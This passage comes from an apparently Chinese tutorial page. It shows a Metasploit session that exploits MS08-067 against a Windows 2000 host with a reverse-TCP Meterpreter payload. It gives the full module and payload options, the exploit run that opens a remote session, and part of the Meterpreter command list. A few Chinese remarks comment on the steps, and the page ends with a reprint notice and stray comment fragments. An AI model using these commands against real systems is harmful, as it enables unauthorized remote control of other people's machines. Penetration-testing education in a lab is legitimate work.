payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
—- ————— ——– ———–
RHOST 192.168.200.140 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC thread yes Exit technique: seh, thread, process,none
LHOST 192.168.200.148 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
— —-
0 Automatic Targeting
msf exploit(ms08_067_netapi) >
通过showoptions获得信息可以看到,需要设置的参数和Reverse_Shell没有什么区别(注意这里RHOST和LHOST参数是使用以前的,没有再设置)
但是meterpreter要比Shell功能强大多了
msf exploit(ms08_067_netapi) > exploit
• Started reverse handler on 192.168.200.148:4444
• Automatically detecting the target…
• Fingerprint: Windows 2000 – Service Pack 0 – 4 –lang:English
• Selected Target: Windows 2000 Universal
• Attempting to trigger the vulnerability…
• Sending stage (752128 bytes) to 192.168.200.140
• Meterpreter session 4 opened (192.168.200.148:4444 ->192.168.200.140:2238) at 2011-12-27 01:29:29 -0500
meterpreter >
打个问号,看看我们能做什么
meterpreter > ?
Core Commands
=============
Command Description
——- ———–
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/jisuanjixue/article-28348-6.html
战争只是牺牲部分地区的秩序
Fxfighting
华谊你少赚了吗
打